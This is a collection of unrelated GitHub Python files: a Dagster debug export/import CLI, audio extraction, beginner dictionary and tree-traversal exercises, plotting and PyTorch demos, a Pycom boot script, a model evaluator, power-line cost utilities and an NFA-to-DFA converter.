click\nfrom tqdm import tqdm\n\nfrom dagster._core.debug import DebugRunPayload\nfrom dagster._core.storage.dagster_run import DagsterRunStatus, RunsFilter\nfrom dagster._serdes import deserialize_value\n\nfrom .utils import get_instance_for_cli\n\n\ndef _recent_failed_runs_text(instance):\n lines = []\n runs = instance.get_runs(\n limit=5,\n filters=RunsFilter(statuses=[DagsterRunStatus.FAILURE, DagsterRunStatus.CANCELED]),\n )\n if len(runs) <= 0:\n return \"\"\n for run in runs:\n lines.append(f\"{run.run_id:<50}{run.job_name:<50}{run.status:<20}\")\n return \"Recently failed runs:\\n{}\".format(\"\\n\".join(lines))\n\n\ndef export_run(instance, run, output_file):\n debug_payload = DebugRunPayload.build(instance, run)\n with GzipFile(output_file, \"wb\") as file:\n click.echo(f\"Exporting run_id '{run.run_id}' to gzip output file {output_file}.\")\n debug_payload.write(file)\n\n\n@click.group(name=\"debug\")\ndef debug_cli():\n \"\"\"Commands for helping debug Dagster issues by dumping or loading artifacts from specific runs.\n\n This can be used to send a file to someone like the Dagster team who doesn't have direct access\n to your instance to allow them to view the events and details of a specific run.\n\n Debug files can be viewed using `dagster-webserver-debug` cli.\n Debug files can also be downloaded from the Dagster UI.\n \"\"\"\n\n\n@debug_cli.command(\n name=\"export\",\n help=\"Export the relevant artifacts for a job run from the current instance in to a file.\",\n)\n@click.argument(\"run_id\", type=str)\n@click.argument(\"output_file\", type=click.Path())\ndef export_command(run_id, output_file):\n with get_instance_for_cli() as instance:\n run = instance.get_run_by_id(run_id)\n if run is None:\n raise click.UsageError(\n f\"Could not find run with run_id '{run_id}'.\\n{_recent_failed_runs_text(instance)}\"\n )\n\n export_run(instance, run, output_file)\n\n\n@debug_cli.command(\n name=\"import\", help=\"Import the relevant artifacts from debug files in to the current instance.\"\n)\n@click.argument(\"input_files\", nargs=-1, type=click.Path(exists=True))\ndef import_command(input_files: Tuple[str, ...]):\n debug_payloads: List[DebugRunPayload] = []\n for input_file in input_files:\n with GzipFile(input_file, \"rb\") as file:\n blob = file.read().decode(\"utf-8\")\n debug_payload = deserialize_value(blob, DebugRunPayload)\n debug_payloads.append(debug_payload)\n\n with get_instance_for_cli() as instance:\n for debug_payload in debug_payloads:\n run = debug_payload.dagster_run\n click.echo(f\"Importing run {run.run_id} (Dagster: {debug_payload.version})\")\n if not instance.has_snapshot(run.execution_plan_snapshot_id): # type: ignore # (possible none)\n instance.add_snapshot(\n debug_payload.execution_plan_snapshot,\n run.execution_plan_snapshot_id,\n )\n if not instance.has_snapshot(run.job_snapshot_id): # type: ignore # (possible none)\n instance.add_snapshot(\n debug_payload.job_snapshot,\n run.job_snapshot_id,\n )\n\n if not instance.has_run(run.run_id):\n instance.add_run(run)\n\n for event in tqdm(debug_payload.event_list):\n instance.store_event(event)\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/dagster/dagster/_cli/debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":3513,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"34383540924","text":"import argparse\nimport moviepy.editor as mp\nimport os\n\n\ndef extract_audio(video_file_path, output_file_path):\n \"\"\"\n 
Extract the audio track from a video file\n    :param video_file_path: path to the video file\n    :param output_file_path: directory in which to save the audio file\n    :return: path to the audio file\n    \"\"\"\n    path = os.getcwd()\n    my_clip = mp.VideoFileClip(video_file_path)\n    output_dir_path = os.path.join(path, output_file_path)\n    audio_path = os.path.join(output_dir_path, os.path.basename(video_file_path)) + \".mp3\"\n    # Create the output directory (skipped if it already exists)\n    os.makedirs(os.path.dirname(audio_path), exist_ok=True)\n    my_clip.audio.write_audiofile(audio_path)\n    return audio_path\n\n\ndef file_exists(file_path):\n    \"\"\"\n    Check whether the file path exists\n    :param file_path: file path\n    :return: the file path if it exists, otherwise False\n    \"\"\"\n    path = os.getcwd()\n    if os.path.isfile(os.path.join(path, file_path)):\n        return os.path.join(path, file_path)\n    elif os.path.isfile(file_path):\n        return file_path\n    else:\n        return False\n\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser(description='Extract audio from a video file')\n    parser.add_argument('video_file_path', type=str, nargs='?', default='./video/1.mp4', help='Path to the video file')\n    parser.add_argument('output_file_path', type=str, nargs='?', default='audio', help='Path to save the extracted audio file')\n    args = parser.parse_args()\n\n    video_file_path = file_exists(args.video_file_path)\n    output_file_path = args.output_file_path\n\n    if video_file_path:\n        try:\n            audio_path = extract_audio(video_file_path, output_file_path)\n            print(\"Successfully extracted the audio from the video\")\n            print(\"Audio file saved to \" + audio_path)\n        except Exception as e:\n            print('Failed to extract the audio from the video')\n            print(\"Error:\", e)\n    else:\n        print(\"Invalid file path!\")\n","repo_name":"ironartisan/videoParse","sub_path":"extra_audio.py","file_name":"extra_audio.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73675889129","text":"laptop = {\n    \"HP\": 20,\n    \"DELL\": 50,\n    \"MACBOOK\": 12,\n    \"ASUS\": 30\n}\n\nlaptop[\"lenovo\"] = laptop[\"ASUS\"]\ndel laptop[\"ASUS\"]\nprint(laptop)\nprint(\"Number of Macbooks in the shop:\", laptop[\"MACBOOK\"])\n\nprint(\"Enter information: \", end=\"\")\ninfor = input()\n\nif infor.isdigit():\n    i = 0\n    index_value = list(laptop.values())\n    index_key = list(laptop.keys())\n    for value in index_value:\n        if int(value) == int(infor):\n            print(index_key[i])\n        i += 1\nelse:\n    print(laptop[infor])\n\n\n","repo_name":"vinhdq2005/vinhdq2005.github.io","sub_path":"mk-CSB08/csb01/lesson9/check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21180948345","text":"import pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport data_frame_creation\n\ndf_list = data_frame_creation.create_TV_data_frames()\ndf = df_list[0]\ndf_first_10 = df_list[1]\nfirst_10_binge = df_list[2]\nfirst_10_serial = df_list[3]\n#initial code in place to call the dataframe creation function and get the set of dataframes we need\n\ndef dual_hist_plot(df_1, df_2):\n    #takes in two dataframes and returns a dual histogram of both layered on top of each other\n    fig = plt.figure()\n    plt.style.use('seaborn')\n    
sns.set_palette('colorblind')\n    hist_serial = sns.distplot(df_1['imdb_score'], kde = False)\n    hist_binge = sns.distplot(df_2['imdb_score'], kde = False)\n    fig.legend(labels=['Serial','Batch'])\n    hist_serial.set_xlabel('IMDb Score')\n    plt.show()\n\ndef box_plot(df):\n    #takes in a dataframe and returns a box and whisker plot of imdb score by episode\n    fig = plt.figure()\n    plt.style.use('seaborn')\n    sns.set_palette('colorblind')\n    ax = sns.catplot(x=\"episode\", y=\"imdb_score\", hue=\"binge_release\", data=df, kind=\"box\")\n    ax.set_axis_labels(\"Episode Number\", \"IMDb Score\")\n    plt.title('Score by Episode')\n    ax._legend.set_title('Release Type')\n    plt.show()\n\n#box_plot(df)\n\ndef simple_box_plot(df):\n    #takes a dataframe and creates a two-part box and whisker grouping the data by release type\n    fig = plt.figure()\n    plt.style.use('seaborn')\n    sns.set_palette('colorblind')\n    ax = sns.boxplot(x= 'binge_release', y = 'imdb_score', data = df)\n    ax.set_ylabel('IMDb Score')\n    ax.set_xlabel('Release Type')\n    plt.show()\n\n#simple_box_plot(df)\n","repo_name":"j-gilkey/TV-Release-Frequency-Analysis","sub_path":"chart_creation.py","file_name":"chart_creation.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2667445671","text":"import torch\nfrom torch import nn\nfrom torch.nn import Linear\n\nclass MLR(nn.Module):\n    def __init__(self, input_size, output_size):\n        super(MLR,self).__init__()\n        self.linear = nn.Linear(input_size, output_size)\n    \n    def forward(self, x):\n        out = self.linear(x)\n        return out\n\nif __name__ == '__main__':\n    torch.manual_seed(1)\n    \n    print('\\n================================')\n    X = torch.tensor([[1.0,1.0],[1.0,2.0],[1.0,3.0]])\n    print(X)\n    print(X.shape)\n    \n    \n    model_lr = Linear(2,2)\n    print(list(model_lr.parameters()))\n    print(model_lr.state_dict())\n    Yhat = model_lr(X)\n    print(Yhat)\n\n    \n    print('\\n================================')\n    model_custom = MLR(2,2)\n    print(list(model_custom.parameters()))\n    print(model_custom.state_dict())\n    Yhat = model_custom(X)\n    print(Yhat)\n\n    \n    \n    ","repo_name":"AngelFelipeMP/Deep-Neural-Networks-with-Pytorch","sub_path":"Week3/Linear_Regression_Multiple_Outputs.py","file_name":"Linear_Regression_Multiple_Outputs.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38066422660","text":"\"\"\" Use a dictionary to store information about a person you know.\nStore their first name, last name, age, and the city in which they live.\nYou should have keys such as first_name, last_name, age, and city.\nPrint each piece of information stored in your dictionary.\"\"\"\n\n#person dictionary\nperson = {\n    'first_name':'David',\n    'last_name':'Jhon',\n    'age':72,\n    'city':'Las Vegas'\n    }\nprint (\"the dictionary of person: \",person)\nprint (f\"{person['first_name']} is {person['age']} years old.\")\n\nfor key,value in person.items():# to loop over all items in the dictionary\n    print('key:',key)\n    print('value:',value)\n    print('')\n    \nfor key in person.keys():#to print only the keys\n    print('only the key: ',key)\n    \nfor value in person.values():#to print only the values\n    print('only the value: ',value)\n\n#persons dictionary with their countries\npersons = {\n    'Hanna':'USA',\n    'Anita':'India',\n    'Sami':'Egypt',\n    'Pedro':'Italy'\n    }\nprint(\"persons with their countries: \",persons)\n\nfor name,country in persons.items():\n    print (f\"Hi {name}, I think you are from {country}.\")\n    \nguests = ['Abdu','Phil','Anita']\nfor guest in guests: #check if guest is in the dictionary.\n    if guest in persons.keys():\n        print(f\"Hi {guest}, thanks for submitting\")\n        \n    else:\n        print(f\"Hi {guest}, please fill the form.\")\n\n#list in dictionary\n#store information about a pizza being ordered\npizza = {\n    'crust': 'thick',\n    
'toppings': ['mushrooms','cheese']\n    }\n#to print the whole information\nprint(f\"you have ordered a {pizza['crust']} crust pizza with the following toppings:\")\nfor topping in pizza['toppings']:\n    print (\"\\t\" + topping)\n    \n#more than one item in the list values of a dictionary\nfavorite_languages = {\n    'jen': ['python', 'ruby'],\n    'sarah': ['c'],\n    'edward': ['ruby', 'go'],\n    'phil': ['python', 'haskell'],\n    }\nfor name, languages in favorite_languages.items():\n    print(f\"{name}'s favorite languages are:\")\n    for language in languages:\n        print(f\"\\t{language}\")\n#many users\nusers = {\n    'Einstein': {\n        'first': 'Albert',\n        'last': 'Einstein',\n        'location': 'princeton',\n        },\n    'Mcurie': {\n        'first': 'marie',\n        'last': 'curie',\n        'location': 'paris',\n        },\n    }\nfor username,userinfo in users.items():\n    print(\"\\nUsername: \" + username)\n    full_name = userinfo['first'] + \" \" + userinfo['last']\n    location = userinfo['location']\n    print(\"\\tfull_name: \" + full_name.title())\n    print(\"\\tlocation: \" + location.title())\n    \n# Make an empty list to store the pets in.\npets = []\n\n# Make individual pets, and store each one in the list.\npet = {\n    'animal type': 'python',\n    'name': 'John',\n    'owner': 'Guido',\n    'weight': 43,\n    'eats': 'bugs',\n}\npets.append(pet)\npet = {\n    'animal type': 'chicken',\n    'name': 'Clarence',\n    'owner': 'Tiffany',\n    'weight': 2,\n    'eats': 'seeds',\n}\npets.append(pet)\n\npet = {\n    'animal type': 'dog',\n    'name': 'Peso',\n    'owner': 'Eric',\n    'weight': 37,\n    'eats': 'shoes',\n}\npets.append(pet)\nprint(pets)\n\n# Display information about each pet.\nfor pet in pets:\n    print(f\"the pet's name is: {pet['name'].title()}\")\n    for key, value in pet.items():\n        print(f\"\\t{key} : {value}\")\n\n\n#favorite places\nfavorite_places = {'John':'Cairo','David':'Tokyo','Susan':'Las Vegas'}\nfor name, city in favorite_places.items():\n    print(f\"{name}, your favorite city is {city}\")\n\n#cities information\ncities = {\n    'Jakarta':{\n        'country':'Indonesia',\n        'population':'30M',\n        'fact':'cool area',\n        },\n    'Roma': {\n        'country':'Italy',\n        'population':'3M',\n        'fact':'old city',\n        },\n    'Cairo':{\n        'country':'Egypt',\n        'population':'100M',\n        'fact':'Pyramid',\n        }\n    }\nprint(cities)\nfor city,info in cities.items():\n    print (f\"the information about {city} is: \")\n    print(f\"\\t country of the city: {info['country']}\")\n    print(f\"\\t population of the city: {info['population']}\")\n    print(f\"\\t fact of the city: {info['fact']}\")\n    print(\"\")\n    \n","repo_name":"Filaraya/Daily-Python-Exercise","sub_path":"Dictionaries.py","file_name":"Dictionaries.py","file_ext":"py","file_size_in_byte":4198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21253605306","text":"\"\"\"\nGiven a binary tree, populate an array to represent its level-by-level traversal in reverse order, i.e., the lowest level comes first. 
You should populate the values of all nodes in each level from left to right in separate sub-arrays.\n\"\"\"\nfrom collections import deque\n\nclass TreeNode:\n    def __init__(self, val):\n        self.val = val\n        self.left, self.right = None, None\n\ndef traverse(root):\n    result = deque()\n    elements = deque([root])\n    while elements:\n        size = len(elements)\n        data = []\n        while size > 0:\n            size -= 1\n            n = elements.popleft()\n            data.append(n.val)\n            if n.left:\n                elements.append(n.left)\n            if n.right:\n                elements.append(n.right)\n        result.appendleft(data)\n    return result\n\ndef main():\n    root = TreeNode(12)\n    root.left = TreeNode(7)\n    root.right = TreeNode(1)\n    root.left.left = TreeNode(9)\n    root.right.left = TreeNode(10)\n    root.right.right = TreeNode(5)\n    print(\"Reverse level order traversal: \" + str(traverse(root)))\n\n\nmain()\n","repo_name":"SharadGupta26/Data-Structures-Problems","sub_path":"Educative Course Solutions/Tree_Breadth_First_Search/Reverse_Level_Order_Traversal.py","file_name":"Reverse_Level_Order_Traversal.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25082634630","text":"#!/usr/bin/env python\nimport os\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nif __name__ == '__main__':\n    nodes_k20 = [13, 243, 2118, 21128, 75714]\n    nodes_k30 = [26, 740, 5028, 46161, 139320]\n    print(nodes_k20)\n    print(nodes_k30)\n\n    fig = plt.figure()\n    ax = plt.subplot(111)\n    n = len(nodes_k20)\n\n    line, = ax.plot(range(10, 60, 10), nodes_k20, label=\"K = 20\")\n    line, = ax.plot(range(10, 60, 10), nodes_k30, label=\"K = 30\")\n\n    ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.05),\n          ncol=3, fancybox=True, shadow=True)\n    plt.xlabel('Number of instances (node)')\n    plt.ylabel('Training running time (s)')\n    plt.show()","repo_name":"Tuanlase02874/Facility-Location-Optimization","sub_path":"visualization/visual_estimate_time.py","file_name":"visual_estimate_time.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28285827448","text":"import os\r\n\r\nimport pycom\r\nfrom machine import UART\r\nfrom network import WLAN, Bluetooth\r\n\r\nuart = UART(0, 115200)\r\nos.dupterm(uart)\r\n\r\n# Disable WiFi\r\nwlan = WLAN()\r\nwlan.deinit()\r\n\r\n# Disable BT\r\nbt = Bluetooth()\r\nbt.deinit()\r\n\r\n# Disable heartbeat and turn off LED\r\npycom.heartbeat(False)\r\npycom.rgbled(0)\r\n","repo_name":"JoF39/archive","sub_path":"pycom/lopy-ph-sensor/boot.py","file_name":"boot.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1983217273","text":"import argparse\nimport importlib\nimport json\nimport logging\nfrom pathlib import Path\nfrom typing import Any as NDArray\nfrom typing import Tuple, Union\n\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow import data as tf_data\nfrom tqdm import tqdm\n\nfrom src.utils.argparser import create_modelevaluator_parser\nfrom src.utils.io import get_downstream_dir, get_upstream_dir\nfrom src.utils.types import SampleType\n\n_logger = logging.getLogger(__name__)\n_handler = logging.StreamHandler()\n_handler.setStream(tqdm)\n_logger.addHandler(_handler)\n\n\nclass Evaluator:\n    _model = None\n    _BATCH_SIZE = 128\n\n    def __init__(\n        self,\n        evaluator_module: str,\n        model_path: Union[Path, None] = None,\n        input_path: Path = get_upstream_dir(),\n        output_path: Path = get_downstream_dir(),\n    ):\n        self._evaluator_module = evaluator_module\n        
if model_path is None:\n model_path = input_path.joinpath(\"model\")\n self._model_path = model_path\n self._input_path = input_path\n self._output_path = output_path\n\n def load_model(self):\n self._model = tf.keras.models.load_model(self._model_path)\n\n def load_dataset(\n self, sample_type: SampleType\n ) -> Union[Tuple[tf_data.Dataset, tf_data.Dataset, NDArray], None]:\n filename = sample_type.value + \"_X.npz\"\n path = Path(self._input_path).joinpath(filename)\n if not path.exists():\n return None\n X = np.load(path.as_posix(), allow_pickle=True)\n\n filename = sample_type.value + \"_Y.npz\"\n path = Path(self._input_path).joinpath(filename)\n if not path.exists():\n return None\n Y = np.load(path.as_posix(), allow_pickle=True)\n\n filename = sample_type.value + \"_Z.npz\"\n path = Path(self._input_path).joinpath(filename)\n if path.exists():\n Z = np.load(path.as_posix(), allow_pickle=True)\n else:\n Z = None\n\n X = self._npzfile_to_tf(X)\n Y = self._npzfile_to_tf(Y)\n if Z is not None:\n Z = self._npzfile_to_numpy(Z)\n return X, Y, Z\n\n @staticmethod\n def _npzfile_to_tf(X) -> tf_data.Dataset:\n X = tuple(tf.constant(X[arr]) for arr in X.files)\n X = tf_data.Dataset.from_tensor_slices(X)\n return X\n\n @staticmethod\n def _npzfile_to_numpy(X) -> NDArray:\n X = tuple(X[arr] for arr in X.files)\n return X\n\n def evaluate(\n self,\n sample_type: SampleType,\n X: tf_data.Dataset,\n Y: tf_data.Dataset,\n Z: NDArray = None,\n **kwargs,\n ) -> None:\n evaluator_module = importlib.import_module(\n self._evaluator_module, \"src.modelevaluator\"\n )\n evaluator_module.evaluate(\n model=self._model,\n X=X,\n Y=Y,\n Z=Z,\n output_path=self._output_path.joinpath(sample_type.value),\n **kwargs,\n )\n\n\ndef main():\n modelevaluator_parser = create_modelevaluator_parser()\n parser = argparse.ArgumentParser(parents=[modelevaluator_parser])\n args = parser.parse_args()\n\n _logger.info(\"start Evaluator\")\n evaluator = Evaluator(args.evaluator_module)\n _logger.info(\"start Loading model\")\n evaluator.load_model()\n for sample_type in SampleType.get_list():\n _logger.info(f\"{sample_type} evaluator: start Loading data\")\n dataset = evaluator.load_dataset(sample_type)\n if dataset is not None:\n _logger.info(f\"{sample_type} evaluator: start Evaluating\")\n evaluator.evaluate(\n sample_type, *dataset, **json.loads(args.evaluator_params)\n )\n\n\nif __name__ == \"__main__\":\n logging.basicConfig()\n logging.getLogger().setLevel(logging.DEBUG)\n main()\n","repo_name":"mzk622/BERT-for-PAS","sub_path":"src/modelevaluator/evaluator.py","file_name":"evaluator.py","file_ext":"py","file_size_in_byte":3722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36617782295","text":"import numpy as np\ntry:\n from skimage.segmentation import watershed\n from skimage import filters\nexcept ModuleNotFoundError:\n pass\nfrom power_planner.utils.utils import (\n bresenham_line, discrete_angle_costs, angle\n)\n\n\nclass CostUtils():\n\n @staticmethod\n def get_seeds(greater_zero, factor):\n \"\"\"\n Get seeds in grid of every factor pixel\n Arguments:\n greater_zero: binary image indicating where seeds are to be placed\n factor: every factor pixel is a seed\n Returns:\n Array of same shape as greater zero with grid of evenly spaced\n values ranging from 1 to number of seeds\n \"\"\"\n lab = 0\n x_len, y_len = greater_zero.shape\n seeds = np.zeros(greater_zero.shape)\n omitted = 0\n # consider every factor pixel in each dimension\n for i in 
np.arange(0, x_len, factor):\n            for j in np.arange(0, y_len, factor):\n                if greater_zero[i, j]:\n                    # set seed with new index\n                    seeds[i, j] = lab\n                    lab += 1\n                else:\n                    omitted += 1\n        print(\"omitted:\", omitted)\n        return seeds\n\n    @staticmethod\n    def watershed_transform(cost_rest, factor, compact=0.01, func=\"mean\"):\n        \"\"\"\n        Cluster the cost surface with a compact watershed transform and pool\n        the costs of each cluster into its center pixel.\n        :param cost_rest: cost array of shape (classes, x, y)\n        :param factor: spacing of the regularly placed seeds\n        :param compact: compactness parameter of the watershed\n        :param func: name of the numpy pooling function, e.g. \"mean\"\n        \"\"\"\n        pool_func = eval(\"np.\" + func)\n        # take mean image for clustering TODO: weighted sum?\n        img = np.mean(cost_rest, axis=0)\n\n        greater_zero = (img > 0).astype(int)\n\n        # get edge image\n        edges = filters.sobel(img)\n        # get regular seeds\n        seeds = CostUtils.get_seeds(greater_zero, factor)\n        print(\"number seeds: \", np.sum(seeds > 0))\n\n        w1 = watershed(edges, seeds, compactness=compact)\n        # w1 is full watershed --> labels spread over corridor borders\n        # but: label 0 also included --> +1 before corridor\n        w1_g_zero = (w1 + 1) * greater_zero\n        # labels: 0 is forbidden, 1 etc is watershed labels\n        labels = np.unique(w1_g_zero)\n\n        new_cost_rest = np.zeros(cost_rest.shape)\n        # iterate over labels (except for 0 - forbidden)\n        for _, lab in enumerate(labels[1:]):\n            x_inds, y_inds = np.where(w1_g_zero == lab)\n            for j in range(len(cost_rest)):\n                new_cost_rest[j, int(np.mean(x_inds)),\n                              int(np.mean(y_inds))] = pool_func(\n                                  cost_rest[j, x_inds, y_inds]\n                              )\n        return new_cost_rest\n\n    @staticmethod\n    def simple_downsample(img, factor, func=\"mean\"):\n        \"\"\"\n        Summarize pixels into one with a certain function\n        Arguments:\n            img: input 3d Array of costs (first dim: cost classes)\n            factor: how many pixels to summarize\n            func: pooling function - can be any such as\n                np.mean np.min or np.max\n        Returns:\n            image that is zero everywhere except for the selected points\n        \"\"\"\n        x_len_new = img.shape[1] // factor\n        y_len_new = img.shape[2] // factor\n        new_img = np.zeros(img.shape)\n        pool_func = eval(\"np.\" + func)\n        for i in range(x_len_new):\n            for j in range(y_len_new):\n                patch = img[:, i * factor:(i + 1) * factor, j *\n                            factor:(j + 1) * factor]\n                if np.any(patch):\n                    for k in range(len(new_img)):\n                        part = patch[k]\n                        if np.any(part):\n                            new_img[k, i * factor, j *\n                                    factor] = pool_func(part[part > 0])\n        return new_img\n\n    @staticmethod\n    def downsample(img, factor, mode=\"simple\", func=\"mean\", compact=0.01):\n        if mode == \"simple\":\n            return CostUtils.simple_downsample(img, factor, func=func)\n        elif mode == \"watershed\":\n            return CostUtils.watershed_transform(img, factor, compact=compact)\n        else:\n            raise NotImplementedError\n\n    @staticmethod\n    def inf_downsample(img, factor, func=\"mean\"):\n        x_len_new = img.shape[1] // factor\n        y_len_new = img.shape[2] // factor\n        new_img = np.zeros(img.shape)\n        new_img += np.inf\n        pool_func = eval(\"np.\" + func)\n        for i in range(x_len_new):\n            for j in range(y_len_new):\n                patch = img[:, i * factor:(i + 1) * factor, j *\n                            factor:(j + 1) * factor]\n                if np.any(patch < np.inf):\n                    for k in range(len(new_img)):\n                        part = patch[k]\n                        new_img[k, i * factor, j *\n                                factor] = pool_func(part[part < np.inf])\n        return new_img\n\n    @staticmethod\n    def compute_edge_costs(path, instance):\n        e_costs = []\n        for p in range(len(path) - 1):\n            point_list = bresenham_line(\n                path[p][0], path[p][1], path[p + 1][0], path[p + 1][1]\n            )\n            e_costs.append(\n                np.mean([instance[i, j] for (i, j) in point_list[1:-1]])\n            )\n        # to make it the same size as other costs\n        e_costs.append(0)\n        return e_costs\n\n    @staticmethod\n    def 
compute_angle_costs(path, angle_norm_factor=np.pi / 2):\n        path = np.asarray(path)\n        ang_out = [0]\n        for p in range(len(path) - 2):\n            vec1 = path[p + 1] - path[p]\n            vec2 = path[p + 2] - path[p + 1]\n            ang_out.append(\n                discrete_angle_costs(angle(vec1, vec2), angle_norm_factor)\n            )\n        ang_out.append(0)\n\n        return ang_out\n\n    @staticmethod\n    def compute_raw_angles(path):\n        path = np.asarray(path)\n        ang_out = [0]\n        for p in range(len(path) - 2):\n            vec1 = path[p + 1] - path[p]\n            vec2 = path[p + 2] - path[p + 1]\n            ang_out.append(angle(vec1, vec2))\n        ang_out.append(0)\n        return ang_out\n\n    @staticmethod\n    def emergency_points(hard_cons, costs, max_dist, start_inds, dest_inds):\n        \"\"\"\n        Add points in regular spacing in forbidden areas\n        \"\"\"\n        hard_cons[start_inds[0], start_inds[1]] = 1\n        hard_cons[dest_inds[0], dest_inds[1]] = 1\n        # add grid of emergency points\n        w, h = hard_cons.shape\n        print(w, max_dist)\n        w_inds = np.arange(0, w, max_dist)\n        print(w_inds)\n        w_inds = w_inds.astype(int)\n        h_inds = np.arange(0, h, max_dist).astype(int)\n        print(w_inds)\n        max_cost = np.max(costs)\n        for row in w_inds:\n            hard_cons[row, h_inds] = 1\n            costs[row, h_inds] = max_cost\n        return hard_cons, costs\n","repo_name":"NinaWie/PowerPlanner","sub_path":"power_planner/utils/utils_costs.py","file_name":"utils_costs.py","file_ext":"py","file_size_in_byte":6913,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"73984003368","text":"from classes import AFN\r\nfrom classes import AFD\r\n\r\nEpslon = 'ε'\r\n\r\n_EstadosConcluidos = [] # Ex: ['E1', 'E2', 'E1,E2']\r\n\r\ndef addEstadoConcluido(estado):\r\n    _EstadosConcluidos.append(estado)\r\n\r\ndef ehEstadoConcluido(estado):\r\n    return estado in _EstadosConcluidos\r\n\r\n\r\ndef afnToAFD(afn):\r\n\r\n    delta_afd = {}\r\n    delta = afn.getDelta()\r\n\r\n    #validate the transitions (removes transitions from one word to multiple destinations)\r\n    for estado in delta.keys():\r\n\r\n        delta_afd_aux = validarTransicoes(delta, estado)\r\n        delta_afd.update(delta_afd_aux)\r\n\r\n    #check determinism\r\n    delta_afd = verificaDeterminismo(delta_afd)\r\n\r\n\r\n    estados_iniciais_afn = afn.getEstadosIniciais()\r\n    estados_iniciais_afd = verificaSubEstados(delta_afd, estados_iniciais_afn)\r\n\r\n    estados_finais_afn = afn.getEstadosFinais()\r\n    estados_finais_afd = verificaSubEstados(delta_afd, estados_finais_afn)\r\n\r\n\r\n    afd = AFD(delta_afd, estados_iniciais_afd, estados_finais_afd)\r\n\r\n    return afd\r\n\r\ndef getPalavra(transicao):\r\n    return transicao[0]\r\n\r\ndef getDestino(transicao):\r\n    return transicao[1]\r\n\r\n# Turns multiple transitions on the same word into a single transition to a group of states\r\ndef validarTransicoes(delta, estados):\r\n\r\n    estados_destinos = {} # { palavra : [estados] }\r\n    transicoes = []\r\n    delta_aux = {} # { estado : [(palavra, destino)] }\r\n\r\n    if type(estados) == list:\r\n        # build the name of the new state\r\n        estados = sorted(estados)\r\n        novo_estado = ','.join(estados)\r\n\r\n    else:\r\n        novo_estado = estados\r\n        estados = [estados]\r\n\r\n    #bail out if the state has already been processed\r\n    if ehEstadoConcluido(novo_estado):\r\n        return {}\r\n    else:\r\n        addEstadoConcluido(novo_estado)\r\n\r\n    #collect all possible transitions\r\n    for estado in estados:\r\n        transicoes.extend(delta[estado])\r\n\r\n    # Group the destination states by word\r\n    for transicao in transicoes:\r\n        palavra = getPalavra(transicao)\r\n\r\n        # Add the destination to the destination-states dictionary\r\n        if palavra in estados_destinos.keys():\r\n            if not getDestino(transicao) in estados_destinos[palavra]:\r\n                estados_destinos[palavra] += [getDestino(transicao)]\r\n\r\n        # Add the new word to the dictionary of possibilities\r\n        else:\r\n            estados_destinos[palavra] = [getDestino(transicao)]\r\n\r\n    #build the AFD from the collected data\r\n    delta_aux[novo_estado] = []\r\n    for palavra in estados_destinos.keys():\r\n        estado_destino = ','.join(estados_destinos[palavra])\r\n        delta_aux[novo_estado] += [(palavra, estado_destino)]\r\n\r\n    for palavra in estados_destinos.keys():\r\n        delta_aux.update(validarTransicoes(delta, estados_destinos[palavra]))\r\n\r\n    return delta_aux\r\n\r\ndef pegaPalavrasAFD(afd):\r\n    palavras = []\r\n    for estado in afd.keys():\r\n        for transicao in afd[estado]:\r\n            palavra = getPalavra(transicao)\r\n            if not palavra in palavras:\r\n                palavras.append(palavra)\r\n\r\n    return palavras\r\n\r\ndef verificaDeterminismo(delta):\r\n    palavras = pegaPalavrasAFD(delta)\r\n    estados = delta.keys()\r\n\r\n    #pick a name for the sink (dead) state\r\n    estado_id = 0\r\n    estado_buraco = 'E' + str(estado_id)\r\n    while estado_buraco in estados:\r\n        estado_id += 1\r\n        estado_buraco = 'E' + str(estado_id)\r\n\r\n    buraco_usado = False\r\n    for estado in estados:\r\n\r\n        #find which words are missing for this state\r\n        palavras_faltando = palavras.copy()\r\n        for transicao in delta[estado]:\r\n            palavra_atual = getPalavra(transicao)\r\n            if palavra_atual in palavras_faltando:\r\n                palavras_faltando.remove(palavra_atual)\r\n\r\n\r\n        for palavra in palavras_faltando:\r\n            delta[estado].append((palavra, estado_buraco))\r\n            buraco_usado = True\r\n\r\n    if buraco_usado:\r\n        delta[estado_buraco] = []\r\n        for palavra in palavras:\r\n            delta[estado_buraco].append((palavra, estado_buraco))\r\n\r\n\r\n    return delta\r\n\r\ndef verificaSubEstados(delta, estados):\r\n    for estado in delta.keys():\r\n        if estado in estados:\r\n            continue\r\n\r\n        sub_estados = estado.split(',')\r\n        pertence = any(estado in sub_estados for estado in estados)\r\n        if pertence:\r\n            estados.append(estado)\r\n\r\n    return estados\r\n\r\n#delta = {'E1': [('a', 'E3'), ('a', 'E6'), ('a', 'E7'), ('b', 'E5'), ('b', 'E6'), ('b', 'E7')], 'E2': [('a', 'E3'), ('a', 'E6'), ('a', 